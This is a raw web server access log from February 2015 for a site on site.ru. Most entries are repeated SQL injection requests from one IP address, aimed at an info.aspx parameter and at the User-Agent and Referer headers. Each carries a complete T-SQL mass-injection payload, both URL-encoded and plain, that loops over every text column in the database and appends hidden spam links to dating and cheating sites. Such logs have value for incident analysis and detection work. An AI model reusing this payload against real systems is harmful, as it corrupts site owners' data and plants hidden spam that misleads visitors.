Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3361 0
2015-02-23 17:25:42 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2122 0
2015-02-23 17:25:42 GET /info.aspx infoid=20');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''why%20men%20cheat%20on%20beautiful%20women%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.armanda.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''women-who-cheat-with-married-men.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''husbands%20that%20cheat''%20when%201%20then%20''click%20here''%20else%20''married%20cheaters''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20click%20here''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3364 0
2015-02-23 17:25:43 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2124 15
2015-02-23 17:25:48 GET /sitemap.xml - 217.69.134.52 HTTP/1.0 Mozilla/5.0+(compatible;+Linux+x86_64;+Mail.RU_Bot/Fast/2.0;++http://go.mail.ru/help/robots) - site.ru 200 22979 369 15
2015-02-23 17:25:49 GET /info.aspx infoid=20';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''online%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.businessdating.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''How-women-cheat%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''wives%20that%20cheat''%20when%201%20then%20''redirect''%20else%20''most%20women%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20women%20want%20men''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3227 15
2015-02-23 17:25:49 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2038 0
2015-02-23 17:25:53 GET /info.aspx infoid=20;declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''online%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.businessdating.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''How-women-cheat%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''wives%20that%20cheat''%20when%201%20then%20''redirect''%20else%20''most%20women%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20women%20want%20men''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 31410 3224 2703
2015-02-23 17:25:56 GET /info.aspx infoid=20);declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''online%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.businessdating.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''How-women-cheat%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''wives%20that%20cheat''%20when%201%20then%20''redirect''%20else%20''most%20women%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20women%20want%20men''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3227 0
2015-02-23 17:25:56 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2038 0
2015-02-23 17:25:57 GET /info.aspx infoid=20');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''online%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.businessdating.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''How-women-cheat%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''wives%20that%20cheat''%20when%201%20then%20''redirect''%20else%20''most%20women%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20women%20want%20men''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- 